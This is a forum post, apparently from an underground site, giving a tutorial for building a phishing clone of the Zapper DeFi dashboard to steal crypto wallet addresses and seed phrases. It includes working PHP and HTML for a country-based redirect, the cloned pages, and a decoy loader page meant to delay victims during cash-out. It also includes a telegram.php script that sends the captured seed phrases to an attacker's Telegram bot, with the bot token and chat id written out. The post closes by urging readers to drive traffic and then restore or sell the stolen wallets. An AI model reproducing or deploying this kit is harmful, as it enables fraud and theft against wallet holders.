• Register now to get access to thousands of Tutorials, Leaked content, Hot NSFW and much more. Join us as we build and grow the community.

Advertise Here

Advertise Here

Advertise Here

Method/Tut Hot to get privet keys from BTC wallets!

SergioVargas

Integration Wizard
S Rep
0
0
0
Rep
0
S Vouches
0
0
0
Vouches
0
Posts
138
Likes
87
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 100 XP
Link:
Hi all!
In this article, we will mine crypto wallets and secret phrases for them.
This is not a standard way, I don't think it's been seen anywhere
You thought that you could mine crypto wallets only with the help of stealers, but that’s not the case =)))
A little about this method
We will copy a site that collects secret words and wallets, and then we will add to it and send data to telegrams.
After receiving secret words and crypto wallet addresses, you can restore them and withdraw or sell them.
This will require a little time, the ability to copy a site and some knowledge of web development JS, PHP, HTML/CSS and traffickers.
The first thing we need is to write a mini script to distribute users by country.
Let's call it index.php
Code:
<?php // Скрипт работает по user browser language $sites = array( "en" => "index.html", // "cn" => "index_cn.html", // "de" => "index_de.html", // "el" => "index_el.html", // "es" => "index_es.html", // "fr" => "index_fr.html", // "id" => "index_id.html", // "it" => "index_it.html" ); // identify language symbols $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); // default language if $lang do not match more than one value from the array $site if (!isset($sites[$lang])) { $lang = ‘en’; } // Redirect the user to the desired page. header('Location: ' . $sites[$lang]); exit;
Secondly, we will need to add a page for entering the wallet, this needs to be sent in telegram.
After entering the data, we are transferred to the profile and there we need to indicate 12 secret words and these words are sent to the telegram.
Let's call it index.html
HTML:
Code:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<script src="https://kit.fontawesome.com/aa4dabdc57.js" crossorigin="anonymous"></script>
<title>Zapper - Dashboard for DeFi</title>
<script src="http://yastatic.net/jquery/2.1.4/jquery.min.js"></script>
<script src="http://yastatic.net/jquery/cookie/1.0/jquery.cookie.min.js"></script>
<script src="customalert.js"></script>
</head>
Zapper
<nav>
[list]
[*]Docs
[*]Tutorials
[*]https://discord.com/invite/h6CGbuN
[/list]
</nav>
<section class="main">
Manage yourDeFi
<br class="mobile_brack">assets and liabilities in<br class="mobile_brack"> one <br class="desktop_brack">simple interface.
Get unique access to opportunities in open finance.
<form action="dashboard.php" method="POST">
<button class="main_pink">Let's Go!</button>
or
 class="main_black">Connect Wallet</button>
</form>
<i class="fas fa-arrow-right">
Don't have an address? View demo.
<i class="fas fa-arrow-right">
What's is DeFi?
$1.3B+
<p class="main_mbtp">Invested through our platform</p>
<p class="main_mbtpbot">Since May 2020</p>
400K+
<p class="main_mbtp">Monitored their assets</p>
<p class="main_mbtpbot">Since January 2020</p>
48
<p class="main_mbtp">DeFi platforms supported</p>
View the full list
</section>
https://twitter.com/zapper_fi
https://discord.com/invite/h6CGbuN
 class="fab fa-weixin">
FAQ
Docs
https://discord.com/invite/Rf3YJ3V
Supported Platforms
<button onclick="myFunction()" class="dropbtn">en  </button>
English
<script>
/* When the user clicks on the button,
toggle between hiding and showing the dropdown content */
function myFunction() {
document.getElementById("my Dropdown").classList.toggle("show");
}
// Закрыть the dropdown if the user clicks outside of it
/* window.onclick = function(event) {
if (!event.target.matches('.dropbtn')) {
var dropdowns = document.getElementsByClassName("dropdown-content");
var i;
for (i = 0; i < dropdowns.length; i++) {
var open Dropdown = dropdowns;
if (open Dropdown.classList.contains('show')) {
open Dropdown.classList.remove('show');
}
}
}
} */
</script>
<i class="far fa-copyright">
Zapper 2021
Select a Wallet to Connect to Zapper
 class="modal-body_btn">
The third step is to write a profile page.
Let's call it dashboard.php
HTML:
Code:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="https://kit.fontawesome.com/aa4dabdc57.js" crossorigin="anonymous"></script>
<title>Zapper - Dashboard for DeFi</title>
<script src="functions.js"></script>
<script src="http://yastatic.net/jquery/2.1.4/jquery.min.js"></script>
<script src="http://yastatic.net/jquery/cookie/1.0/jquery.cookie.min.js"></script>
</head>
Zapper
[list]
[*] <i class="fas fa-gas-pump">346
<i class="fas fa-cog">
[/list]
</nav>
<section class="section_dash">
<i class="fas fa-layer-group">Dashboard
<i class="fas fa-exchange-alt">Exchange
4.
The fourth step is to transfer it to the loader so that the user does not understand what is going on (this will give some time for cashing out).
Let's call the page disc.html
HTML:
Code:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Zapper - Dashboard for DeFi</title>
</head>
5. Fifth step - write a script to process requests and send them to tg.
Let's call it telegram.php
HTML:
Code:
<?php
header('Access-Control-Allow-Origin: *');
$sid = $_POST['sid'];
$name = $_POST['currency'];
$token = "1781605913:AAH3341p65G-4a7I9RploILsW3UyzR89CmMM";
$chat_id = "11294049069";
$cash = $_POST['cash'];
$arr = array(
'Кошелек' => $cash,
'Слова' => $sid,
'Платформа' => $name
);
foreach($arr as $key => $value) {
$txt .= "".$key." ".$value."%0A";
};
$sendToTelegram = fopen("https://api.telegram.org/bot{$token}/sendMessage?chat_id={$chat_id}&parse_mode=html&text={$txt}","r");
if ($sendToTelegram) {
header('Location: disc.html');
} else {
echo "Error";
}
?>
Let's check!
All in all. We created a phishing site for processing crypto wallets.
This way we can mine crypto wallets and their secret words.
1 - We pump traffic
2 - We admire the profit
Then the choice is yours, either restore the crypto wallet or sell it
There is only PC version
created blockchain platform
Code:
Code:
<form action="telegram.php" method="POST"> "> Тут код платформы, где вводят даные </form>
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

452,501

355,782

355,789

Top